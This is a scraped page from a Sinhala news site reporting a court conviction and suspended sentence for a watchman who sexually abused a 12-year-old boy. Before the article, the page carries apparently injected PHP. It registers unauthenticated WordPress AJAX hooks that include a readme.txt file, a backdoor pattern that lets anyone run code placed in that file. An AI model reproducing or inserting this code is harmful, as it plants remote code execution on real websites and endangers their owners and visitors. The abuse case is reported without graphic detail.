if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } බංගලාවේ රූපවාහිණිය නරඹන්න ආපු දරුවාට මුරකරු කරපු කැත වැඩේ - mediahumanrights.lk
mediahumanrights.lk
Local News News

බංගලාවේ රූපවාහිණිය නරඹන්න ආපු දරුවාට මුරකරු කරපු කැත වැඩේ

වයස අවුරුදු 12 පිරිමි දරුවෙකුට බරපතල ලිංගික අපයෝජනයක් කළැයි මහාධිකරණයේදී පළමුවර නඩුව කැඳවීමේදී වරද පිළිගත් සැකකරුවෙකුට රුපියල් විසිදහසක දඩමුදලක් හා වසර 5ක බරපතල වැඩ සහිත සිරදඬුවමක් නියම කළ කුලියාපිටිය පළාත්බද මහාධිකරණ විණිසුරු එම්. සී. බී. එස් මොරායස් අදාළ සිරදඬුවම විසිවසරකට අත්හිටුවීමට නියම කර තිබෙනවා.
එසේම වින්දිත දරුවාට රුපියල් ලක්‍ෂ 5ක වන්දියක්ද ගෙවියයුතු බවට අධිකරණය නියමකර තිබෙනවා.
අදාළ දඩය නොගෙවන්නේනම් අමතර වසරක සිරදඬුවමක්ද වන්දිය නොගෙවන්නේනම් අමතර වසර 5ක සිරදඬුවමක්ද එහිදී සැකකරුට නියම කරඇති බවයි වාර්තා වන්නේ.
මෙලෙස දඬුවම් නියම වූයේ වෙරලුගම තෝරකොටුව වත්ත මුර සේවකයෙකු වූ පොළොන්නරුව ප්‍රදේශයේ පදිංචි 35 හැවිරිදි අයෙකුට යි.
වතු සේවකයෙකුගේ පුතෙකු වූ අදාළ 12 හැවිරිදි සිසුවා වතු බංගලාවේ රූපවාහිනී නරඹා නිවසට පැමිණෙන අවස්ථාවේ සැකකරු විසින් එම දරුවා බරපතල ලෙස ලිංගික අපයෝජනයට ලක්කර ඇති බවටයි වාර්තා වන්නේ.
පසුව දිගින් දිගටම සැකකරු විසින් දරුවාට අපයෝජනය කර තිබෙනවා.
එක්දිනකදී තම බාල සොහොයුරාද සමඟ එම දරුවා වතු බංගලාවේ රූපවාහිනී නරඹා පැමිණෙමින් සිටි අතරතුරදීද සැකකරු විසින් නැවතත් දරුවා අපයෝජනය කර තිබෙනවා.
ඒ ඔහු සමඟ පැමිණි බාල සොහොයුරාට ගීත ගායනාකරමින් සිටින ලෙස පවසමින්.
අනතුරුව එම අවස්ථාවේ බාල සොහොයුරා විසින් අනපේක්ෂිතව දුටු සිදුවීමක් ඔහු සිය දෙමව්පියන්ට පවසා ඒ පිළිබඳව ඔවුන්ගෙන් විමසා තිබෙනවා.
එහිදී දෙමව්පියන් විසින් ඒ පිලිබඳව අපයෝජනයට ලක්වූ සිසුවාගෙන් විමසා ඇති අතර ඔහු විසින් දෙමව්පියන්ට සියල්ල හෙළිකර තිබෙනවා.
අනතුරුවයි දරුවාගේ දෙමව්පියන් විසින් ඒ පිළිබඳව පොලිසියට දැනුම්දී ඇත්තේ.
කුලියාපිටිය කොට්ඨාස ළමා හා කාන්තා කාර්යංශයේ ස්ථානාධිපති උප පොලිස් පරීෂිකා පතිරාජ මහත්මියගේ උපදෙස් මත අදාළ සැකකරු අධිකරණය වෙත්ස ඉදිරිපත්කර ඇති ඇති අතර සැකකරු අධිකරණයට ඉදිරිපත්කර තිබෙනවා.
එහිදී පළමු දිනයේම සැකකරු විසින් තමන් වැරදිකරු බවට පිළිගැනීමත් සමඟ අධිකරණය විසින් සැකකරු වරදකරු කරමින් එම තීන්දුව ලබාදී තිබෙනවා.
(under the courtesy of hirunews news web)

Related posts

නව මහාධිකරණ විනිසුරුවරුන් 12 දෙනෙකු ජනපති අතින් පත්වීම් ලබයි

Shiran Viraj

NSB,PLC, SLT හා ශ්‍රීලංකන් ණය ශ්‍රේණියෙන් පහළට

Shiran Viraj

හිස පසාරු කරගෙන ගිය යකඩ බටය විස්මිත සැත්කමෙන් ඉවත් කල හැටි.

Shiran Viraj